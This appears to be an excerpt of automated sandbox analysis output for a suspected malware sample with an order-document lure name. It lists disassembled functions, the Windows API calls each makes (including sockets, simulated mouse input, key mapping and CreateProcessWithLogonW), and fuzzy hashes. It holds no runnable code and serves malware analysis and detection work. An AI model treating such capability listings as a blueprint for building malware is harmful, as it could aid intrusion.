Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: c0b6ec0b16362bb6ae81a7af8a1febca1b07ea38654e019c0b412c9860e57b4e
Instruction ID: 5892b1df70f304c10d3e3d6946ecdd82f90192a315b1b5be1dc16ffe62a05a2c
Opcode Fuzzy Hash: c0b6ec0b16362bb6ae81a7af8a1febca1b07ea38654e019c0b412c9860e57b4e
Instruction Fuzzy Hash: B8516A71504240AFC704EF65C881E6EBBF9FF89308F04492EF55597291EB39EA09CB5A

Function 004684DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00468540
GetMenuItemCount.USER32(00000000), ref: 00468577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0046859F
GetMenuItemID.USER32(?,?), ref: 0046860E
GetSubMenu.USER32(?,?), ref: 0046861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0046866D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
Instruction ID: 4a32b333b28820789701f84416726f710a670bfdff4336e242cca42d78ce286a
Opcode Fuzzy Hash: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
Instruction Fuzzy Hash: 1751B371E00214AFCF11DF55C941AAEB7F4EF48314F10456EE906B7391EB78AE418B9A

Function 00444AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444B5B
IsMenu.USER32(00000000), ref: 00444B7B
CreatePopupMenu.USER32 ref: 00444BAF
GetMenuItemCount.USER32(000000FF), ref: 00444C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00444C3E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
Instruction ID: e6a5e1f3890da4a0aceb300d286543e28b665d01a084fc0334bc1157647a2e2d
Opcode Fuzzy Hash: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
Instruction Fuzzy Hash: 3B51E070A02259EBEF20CF64D888BAEBBF4EF84318F18411EE4159B291D778D940CB19

Function 00458DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0049DC00), ref: 00458E7C
WSAGetLastError.WSOCK32(00000000), ref: 00458E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00458EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00458EC5
_strlen.LIBCMT ref: 00458EF7
WSAGetLastError.WSOCK32(00000000), ref: 00458F6A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
Instruction ID: 492fe9b31153af44185be34426d0c69a1573ed1426ef4a2bf17fc750f9245427
Opcode Fuzzy Hash: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
Instruction Fuzzy Hash: 0941E971900104AFC704EB65CD86EAEB7B9AF48315F10466EF916A72D2DF38AE04CB58

Function 0041ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

BeginPaint.USER32(?,?,?), ref: 0041AC2A
GetWindowRect.USER32(?,?), ref: 0041AC8E
ScreenToClient.USER32(?,?), ref: 0041ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0041ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0041AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0047E673

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
Instruction ID: bc17de8597850ac8ecd1a7f4a605dc630b75c4cd4743ccb3255f9716c6cbda2d
Opcode Fuzzy Hash: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
Instruction Fuzzy Hash: A541C4706052009FC710DF25DC84FBB7BA8EF5A324F04066EF994872A2D3349895DBAA

Function 0046E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C1628,00000000,004C1628,00000000,00000000,004C1628,?,0047DC5D,00000000,?,00000000,00000000,00000000,?,0047DAD1,00000004), ref: 0046E40B
EnableWindow.USER32(00000000,00000000), ref: 0046E42F
ShowWindow.USER32(004C1628,00000000), ref: 0046E48F
ShowWindow.USER32(00000000,00000004), ref: 0046E4A1
EnableWindow.USER32(00000000,00000001), ref: 0046E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0046E4E8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
Instruction ID: e38680d0e56c83b23c7f5844027bfffcbb6f046283c39d97626a6b1eca441d47
Opcode Fuzzy Hash: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
Instruction Fuzzy Hash: 9A418378601140EFDB25CF36C499B957BE1FF05704F1841BAEA588F2A2DB35E841CB56

Function 004498BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004498D1

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00449908
EnterCriticalSection.KERNEL32(?), ref: 00449924
LeaveCriticalSection.KERNEL32(?), ref: 0044999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004499B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 004499D2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 83b1f9b753ad54886ea1b91ec098c3c4677a062786415882a4ed0891fbc3d2ac
Instruction ID: 6d9c1d8ffcb9c1f7d0860105f5f55980207e4b5724d6ad1e77c4c748931ed47b
Opcode Fuzzy Hash: 83b1f9b753ad54886ea1b91ec098c3c4677a062786415882a4ed0891fbc3d2ac
Instruction Fuzzy Hash: 13319271A00105ABDB00AF95DD85DAF7778FF44310B1480BAE904AB286D738DE15DB68

Function 00459B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,004577F4,?,?,00000000,00000001), ref: 00459B53

Part of subcall function 00456544: GetWindowRect.USER32(?,?), ref: 00456557

GetDesktopWindow.USER32 ref: 00459B7D
GetWindowRect.USER32(00000000), ref: 00459B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00459BB6

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

GetCursorPos.USER32(?), ref: 00459BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00459C44

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 323fb6abc18116d2f827ac04448a136ccb5cc5ee5b85c66ebd575c10a1bb148f
Instruction ID: 6cc0f5aae42766270b2f120872b1b4917f865e586c391f3cbc7db34d18f04012
Opcode Fuzzy Hash: 323fb6abc18116d2f827ac04448a136ccb5cc5ee5b85c66ebd575c10a1bb148f
Instruction Fuzzy Hash: 2D31E172504309ABD710DF14D849F9BB7E9FF88314F00092EF995E7282D634E908CB96

Function 0043AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0043AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0043AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0043AFC4
CloseHandle.KERNEL32(00000004), ref: 0043AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0043B012

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
Instruction ID: b7a48fbf2d84a4435ac36968e78f9f79161879e2cb968d09ab52d1702d349b35
Opcode Fuzzy Hash: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
Instruction Fuzzy Hash: 4F215072541209AFDF019F94DD09FAE7BA9EF48308F14502AFE41A21A1C37A9D21DB65

Function 0046EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0046EC20
LineTo.GDI32(00000000,00000003,?), ref: 0046EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EC42
LineTo.GDI32(00000000,00000000,?), ref: 0046EC52
EndPath.GDI32(00000000), ref: 0046EC62
StrokePath.GDI32(00000000), ref: 0046EC72

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
Instruction ID: a9fbaf3aecc94b696b7302446875f4ff34609ecfac3ca3e8697b261464c7832e
Opcode Fuzzy Hash: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
Instruction Fuzzy Hash: 2B113572401148BFEF029F90DC88EEA7FADEF09364F048526BE089A1B0D7719D55DBA4

Function 0043E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0043E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0043E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0043E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0043E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0043E209

Part of subcall function 00439AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00439A05,00000000,00000000,?,00439DDB), ref: 0043A53A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
Instruction ID: c7a5ca771fd91314f3d855d0b2c07d8d13f392a1f48880b11d21432277bd3176
Opcode Fuzzy Hash: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
Instruction Fuzzy Hash: D50184B5E01219BFEF10ABA68C45F5EBFB8EB48351F00446AEE04A73D0D6709C00CB64

Function 00427B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00427B47

Part of subcall function 0042123A: __initp_misc_winsig.LIBCMT ref: 0042125E
Part of subcall function 0042123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00427F51
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00427F65
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00427F78
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00427F8B
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00427F9E
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00427FB1
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00427FC4
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00427FD7
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00427FEA
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00427FFD
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00428010
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00428023
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00428036
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00428049
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042805C
Part of subcall function 0042123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0042806F

__mtinitlocks.LIBCMT ref: 00427B4C

Part of subcall function 00427E23: InitializeCriticalSectionAndSpinCount.KERNEL32(004BAC68,00000FA0,?,?,00427B51,00425E77,004B6C70,00000014), ref: 00427E41

__mtterm.LIBCMT ref: 00427B55

Part of subcall function 00427BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00427B5A,00425E77,004B6C70,00000014), ref: 00427D3F
Part of subcall function 00427BBD: _free.LIBCMT ref: 00427D46
Part of subcall function 00427BBD: DeleteCriticalSection.KERNEL32(004BAC68,?,?,00427B5A,00425E77,004B6C70,00000014), ref: 00427D68

__calloc_crt.LIBCMT ref: 00427B7A
GetCurrentThreadId.KERNEL32 ref: 00427BA3

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: c46940ef308119f88cc1cf6a2d93ea9b80c9478267116388c4a26399d49ea1c2
Instruction ID: 025b24fe7e4f8abf5356171388abe4f94745ccd014160fbad4c12bc25ea85440
Opcode Fuzzy Hash: c46940ef308119f88cc1cf6a2d93ea9b80c9478267116388c4a26399d49ea1c2
Instruction Fuzzy Hash: CEF06D3270D2321AE62476767C46B4B2A849F0173CBA106AFF864D51E2EF2DA941457D

Function 004027EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0040281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00402825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00402830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0040283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00402843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0040284B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
Instruction ID: 6e9604c49f6eb5af476f9dbc967e5a635b3d3e71b3018c9c8894ab6170c87e60
Opcode Fuzzy Hash: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
Instruction Fuzzy Hash: 0E016CB0902B5D7DE3008F6A8C85B56FFA8FF15354F00411B915C47941C7F5A864CBE5

Function 00449AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 8364328d02ac5925869c5288c0cd67a6a41bd0c3f79fc2a0b1e62c94dca51390
Instruction ID: 63ce9322e8606113c6e1135c428cb5d5aac42c0829b34d22373603bb17140be1
